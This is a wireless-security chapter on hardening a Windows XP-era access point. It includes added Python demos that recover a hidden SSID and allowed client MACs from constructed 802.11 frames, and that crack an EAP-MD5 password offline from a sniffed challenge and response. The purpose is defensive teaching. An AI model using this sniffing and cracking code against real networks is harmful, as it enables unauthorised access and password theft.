Controlling Connections to a Wireless Access Point
Your first line of defense in securing a wireless network is to make it more difficult for outsiders to connect to the network. That's not an easy task. The antenna in a wireless access point can broadcast its signal hundreds of feet in any direction. That's bad news if you live in a densely populated apartment complex, but even if you have no neighbors within range of the access point, you could still be vulnerable. An enthusiastic community of "drive-by" hackers has turned wireless breaking and entering into a hobby, devising booster antennas and software utilities (with colorful names like AirSnort and Network Stumbler) that allow them to sniff out the details of unprotected networks as they drive through neighborhoods or sit in public areas of an office complex.
TIP
--------------------------------------------------------------------------------
Don't let bad guys reconfigure your network
When you set up your wireless access point for the first time, be sure to change the default password that unlocks the configuration utility. This crucial precaution protects the access point (and the rest of your network) from being reconfigured by an outsider. Default passwords are printed in the manual and posted on the Web, so an intruder doesn't even need to crack them; change the password to one that's easy for you to remember but difficult for a stranger to guess. (If you need some ideas on how to create an effective password, see Creating Strong Passwords.) If your hardware supports disabling wireless administration completely, consider doing without that feature and managing the access point over a direct connection—via Ethernet, USB, or a serial port—instead, so that a configuration session can never be carried out from the parking lot.
Windows XP in particular makes the process of connecting to a wireless LAN extremely easy, thanks to a feature called wireless zero configuration. Most access points automatically broadcast their presence so that client computers can connect as soon as they come in range. When you connect a wireless network adapter to a computer running Windows XP, the operating system automatically discovers nearby access points and configures the adapter to work with the one it finds. That information appears in the list of available networks, shown in Figure 16-1.
Figure 16-1. Windows XP automatically discovers available networks and connects to them without prompting unless you turn on Wired Equivalent Privacy (WEP).
The network name shown in the Available Networks list is also called the Service Set Identifier, or SSID. In this example, which shows the SSID of an Agere Systems (formerly Lucent) RG-1000 Residential Gateway, the SSID is configured automatically using half of the built-in adapter's MAC address. Some manufacturers use default names for the SSID instead; in this case, a would-be intruder who knows the default name could connect to the access point without any additional work. In fact, if you live in an apartment building with thin walls and your next-door neighbor uses the same hardware as you, it's conceivable that one or both of you could inadvertently connect to the wrong network!
You can take any or all of the following three measures to prevent someone from discovering the SSID of your network and trying to connect to it:
Choose a new network name. This is a good idea if your hardware automatically assigns a default name that is identical to those used by other people with the same hardware. Whatever you do, don't use a name that identifies yourself or your business. That bit of information can encourage drive-by hackers to probe more deeply than if you just use a random alphanumeric string.
Don't broadcast your network name. If your hardware includes an option to set up the network as a "closed" system, as the Agere Systems RG-1100 does, consider enabling this option. Anyone who wants to connect to the network will need to supply the network name manually rather than having it filled in automatically by the wireless hardware and Windows XP; this precaution also frustrates active scanning utilities like NetStumbler, which cannot discover the network name when you use this configuration. Be aware of the limits of this measure, though: the access point still answers directed probe requests, and every legitimate client sends the name in the clear in its probe and association requests, so a passive sniffer such as Kismet recovers a "hidden" SSID the moment one of your own computers connects.
Use MAC addresses to limit access. Not all access points include this option, which allows you to specify that the only wireless adapters allowed to connect to your access point are those with MAC addresses on a list you enter. If your network is small, you can easily manage the list manually. For networks that have more than five wireless computers or that guests regularly visit, the administrative burden is unacceptable. Of course, a skilled hacker can spoof a MAC address and bypass this setting: MAC addresses travel unencrypted in the header of every frame, even on a WEP-protected network, so anyone sniffing the air can read your allowed list straight off the frames your own computers send and then change the adapter's address to match. Still, it can be a useful barrier to casual snoops.
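The following example, which is not part of the original chapter, shows why the last two measures above only slow an attacker down. It is a small 802.11 management-frame parser written for this page, run over a constructed four-frame "capture": a beacon from an access point configured as a closed system (zero-length SSID element), then a probe request, probe response and association request from one of its own clients. The MAC addresses, the network name "home-net" and the frame contents are all made up for the illustration; a real capture would come from a card in monitor mode.

```python
import struct

# Management-frame subtypes (IEEE 802.11 frame-control field, type 0).
ASSOC_REQ, PROBE_REQ, PROBE_RESP, BEACON = 0, 4, 5, 8
SUBTYPE_NAME = {ASSOC_REQ: "assoc-req", PROBE_REQ: "probe-req",
                PROBE_RESP: "probe-resp", BEACON: "beacon"}
# Fixed fields that precede the information elements in each body:
# beacon/probe-resp: timestamp(8)+interval(2)+capability(2);
# assoc-req: capability(2)+listen interval(2); probe-req: none.
FIXED_LEN = {ASSOC_REQ: 4, PROBE_REQ: 0, PROBE_RESP: 12, BEACON: 12}
SSID_IE = 0
HDR = struct.Struct("<HH6s6s6sH")  # frame control, duration, addr1, addr2, addr3, seq

def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)

def mac_bytes(text):
    return bytes(int(x, 16) for x in text.split(":"))

def parse_ies(body):
    """Return {element_id: value} from a run of TLV information elements."""
    ies, i = {}, 0
    while i + 2 <= len(body):
        eid, ln = body[i], body[i + 1]
        ies[eid] = body[i + 2:i + 2 + ln]
        i += 2 + ln
    return ies

def parse_mgmt(frame):
    """Decode one 802.11 management frame; None for other frame types."""
    fc, _dur, addr1, addr2, addr3, _seq = HDR.unpack_from(frame)
    ftype, subtype = (fc >> 2) & 0x3, (fc >> 4) & 0xF
    if ftype != 0 or subtype not in FIXED_LEN:
        return None
    ies = parse_ies(frame[HDR.size + FIXED_LEN[subtype]:])
    ssid = ies.get(SSID_IE, b"")
    return {
        "subtype": SUBTYPE_NAME[subtype],
        "dst": mac_str(addr1),   # receiver address, always in the clear
        "src": mac_str(addr2),   # transmitter address, always in the clear
        "bssid": mac_str(addr3),
        # A "closed" access point sends a zero-length SSID element in beacons.
        "ssid": ssid.decode("utf-8", "replace") if ssid else None,
    }

def build_mgmt(subtype, src, dst, bssid, body):
    """Assemble a management frame (used only to construct the sample capture)."""
    return HDR.pack(subtype << 4, 0, mac_bytes(dst), mac_bytes(src),
                    mac_bytes(bssid), 0) + body

def ie(eid, value):
    return bytes([eid, len(value)]) + value

# Constructed addresses and frames; not taken from any real network.
AP, CLIENT, BCAST = "00:02:2d:12:34:56", "00:0c:29:aa:bb:cc", "ff:ff:ff:ff:ff:ff"
RATES = ie(1, bytes([0x82, 0x84, 0x8b, 0x96]))
FIXED_BEACON = bytes(8) + struct.pack("<HH", 100, 1)   # timestamp, interval, capability
SAMPLE_CAPTURE = [
    build_mgmt(BEACON, AP, BCAST, AP, FIXED_BEACON + ie(SSID_IE, b"") + RATES),
    build_mgmt(PROBE_REQ, CLIENT, BCAST, BCAST, ie(SSID_IE, b"home-net") + RATES),
    build_mgmt(PROBE_RESP, AP, CLIENT, AP, FIXED_BEACON + ie(SSID_IE, b"home-net") + RATES),
    build_mgmt(ASSOC_REQ, CLIENT, AP, AP, struct.pack("<HH", 1, 10)
               + ie(SSID_IE, b"home-net") + RATES),
]

def recover_hidden_ssids(frames):
    """Map each BSSID whose beacons hide the SSID to the name its own clients leak."""
    hidden, leaked = set(), {}
    for f in map(parse_mgmt, frames):
        if f is None:
            continue
        if f["subtype"] == "beacon" and f["ssid"] is None:
            hidden.add(f["bssid"])
        elif f["subtype"] in ("probe-resp", "assoc-req") and f["ssid"]:
            leaked[f["bssid"]] = f["ssid"]
    return {b: leaked[b] for b in hidden if b in leaked}

def allowed_client_macs(frames):
    """Addresses that associated: exactly the entries a MAC allow-list admits."""
    return {f["src"] for f in map(parse_mgmt, frames)
            if f and f["subtype"] == "assoc-req"}

if __name__ == "__main__":
    print(recover_hidden_ssids(SAMPLE_CAPTURE))   # {'00:02:2d:12:34:56': 'home-net'}
    print(allowed_client_macs(SAMPLE_CAPTURE))    # {'00:0c:29:aa:bb:cc'}
```

The beacon alone tells the sniffer nothing, which is all the "closed system" option buys you; the probe response and the association request that follow name the network, and the association request also hands over an address that the MAC filter is guaranteed to accept. Neither measure is worthless, but both should be treated as camouflage rather than as authentication.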
If you have access to an enterprise-strength authentication server, you can configure your network so that all connection requests are forced to authenticate through that server. This option uses the 802.1X standard and Extensible Authentication Protocol (EAP): the access point blocks all traffic from a new client except the EAP exchange, which it relays to the server, and opens the port only when the server says the client has authenticated. In the enterprise market, you can choose from a variety of EAP types, most of which use either a certificate or a password to authenticate the wireless client to that server. Used with a RADIUS server and a physical device such as a smart card, this option can be extremely secure.
Support for 802.1X authentication is built into Windows XP. To access these settings, open the properties dialog box for the wireless connection and choose the Authentication tab. Figure 16-2 shows the default settings.
Figure 16-2. If your network includes an authentication server, you can greatly increase the security of a wireless network.
If your network serves a home or small business, you should not tamper with these default settings. Windows XP enables 802.1X authentication by default, but this setting takes effect only when a suitable server is available. Avoid the MD5-Challenge EAP type if you have the choice: EAP-MD5 sends the server's challenge and the client's hashed response over the air in the clear, so an eavesdropper who captures a single logon can run an offline dictionary attack against the password at leisure. It also authenticates only the client, never the server, and produces no keying material, so it cannot be used to hand out per-session encryption keys. A certificate-based EAP type has none of these weaknesses.
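To make the MD5-Challenge weakness concrete, here is an added example (written for this page, not taken from the chapter or from Windows) that builds an EAP-MD5 Request and Response in the RFC 3748 wire format, then plays the eavesdropper: given only the two captured packets, it recovers the password with a dictionary attack. The challenge value, the identifier, the user name "alice", the server name and the weak password "Summer2002" are all constructed for the illustration; a real server would pick the challenge at random.

```python
import hashlib
import struct

EAP_REQUEST, EAP_RESPONSE = 1, 2
EAP_TYPE_MD5 = 4   # "MD5-Challenge" in the Windows XP Authentication tab

def eap_md5_packet(code, identifier, value, name=b""):
    """EAP-MD5 packet: Code, Identifier, Length, Type=4, Value-Size, Value, Name."""
    body = bytes([EAP_TYPE_MD5, len(value)]) + value + name
    return struct.pack("!BBH", code, identifier, 4 + len(body)) + body

def parse_eap_md5(pkt):
    """Return (code, identifier, value, name) or raise if the packet is malformed."""
    code, identifier, length = struct.unpack("!BBH", pkt[:4])
    if length != len(pkt) or pkt[4] != EAP_TYPE_MD5:
        raise ValueError("not an EAP-MD5 packet")
    vsize = pkt[5]
    return code, identifier, pkt[6:6 + vsize], pkt[6 + vsize:]

def md5_challenge_response(identifier, password, challenge):
    """CHAP-style response value: MD5(Identifier || secret || Challenge)."""
    return hashlib.md5(bytes([identifier]) + password + challenge).digest()

# Constructed exchange. Both packets cross the wireless link unencrypted,
# so this is exactly what a sniffer within range records.
IDENT = 0x2A
CHALLENGE = bytes.fromhex("00112233445566778899aabbccddeeff")  # constructed
PASSWORD = b"Summer2002"                                        # hypothetical
REQUEST = eap_md5_packet(EAP_REQUEST, IDENT, CHALLENGE, b"radius.example")
RESPONSE = eap_md5_packet(EAP_RESPONSE, IDENT,
                          md5_challenge_response(IDENT, PASSWORD, CHALLENGE),
                          b"alice")

def crack_eap_md5(request, response, wordlist):
    """Offline dictionary attack on a sniffed Request/Response pair.

    Returns the password that reproduces the captured response, or None.
    No further packets are sent, so the server never sees the guesses.
    """
    _, req_id, challenge, _ = parse_eap_md5(request)
    _, resp_id, answer, _ = parse_eap_md5(response)
    if req_id != resp_id:
        raise ValueError("identifier mismatch: not the same conversation")
    for candidate in wordlist:
        if md5_challenge_response(req_id, candidate, challenge) == answer:
            return candidate
    return None

# A tiny constructed word list; real attacks use millions of entries.
WORDLIST = [b"password", b"letmein", b"Winter2001", b"Summer2002", b"Summer2003"]

if __name__ == "__main__":
    print(crack_eap_md5(REQUEST, RESPONSE, WORDLIST))   # b'Summer2002'
```

Every guess costs one MD5 computation and zero network traffic, which is what "vulnerable to brute force attacks from over the network" means in practice: account lockout on the server never triggers, because the server is not involved. Certificate-based EAP types such as EAP-TLS do not expose a password-derived value on the air at all.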